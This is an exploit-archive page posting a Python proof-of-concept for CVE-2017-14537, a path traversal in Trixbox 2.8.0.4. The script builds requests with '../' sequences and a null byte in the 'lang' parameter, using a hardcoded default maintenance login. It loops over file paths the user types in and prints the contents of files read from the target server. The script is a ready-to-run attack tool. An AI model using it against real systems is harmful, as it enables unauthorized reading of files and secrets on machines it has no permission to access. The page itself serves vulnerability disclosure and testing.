Trixbox 2.8.0.4 Path Traversal

Trixbox 2.8.0.4 Path Traversal: Posted May 28, 2021; Authored by Ron Jost; Trixbox version 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.; tags | exploit, php, file inclusion; advisories | CVE-2017-14537; SHA-256 | fb3bf69481578dad07624872eec1f5d1da61660965e5ddb444e9193956929ed2; Download | Favorite | View

Trixbox 2.8.0.4 Path Traversal

# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
# Date: 27.05.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Credits to: Sachin Wagh
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
# Version: 2.8.0.4
# Tested on: Xubuntu 20.04
# CVE: CVE-2017-14537

'''
Description:
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
lang parameter to /maint/modules/home/index.php.
'''


'''
Import required modules:
'''
import requests
import sys
import urllib.parse


'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]


'''
Construct malicious request:
'''
# Constructing header:
header = {
    'Host': target_ip,
    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    'Cookie': 'template=classic; lng=en; lng=en',
    'Upgrade-Insecure-Requests': '1',
    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
}

# Constructing malicious link (payload):
base_link = 'http://' + target_ip + ':' + target_port
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
base_link_addon_3 = '%00english'
print('')
base_link_addon_2 = input('Input the filepath or input EXIT: ')



'''
EXPLOIT:
'''
while base_link_addon_2 != 'EXIT':
    base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
    exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
    print('')
    exploit = requests.post(exploit_link, headers=header)
    print('Contents of ' + base_link_addon_2 + ':')
    for data in exploit.iter_lines():
        data = data.decode('utf-8')
        if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
            print(data)
        else:
            break
    print('')
    base_link_addon_2 = input('Input the filepath or input EXIT: ')

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Trixbox 2.8.0.4 Path Traversal

Trixbox 2.8.0.4 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Trixbox 2.8.0.4 Path Traversal

Share This

Trixbox 2.8.0.4 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems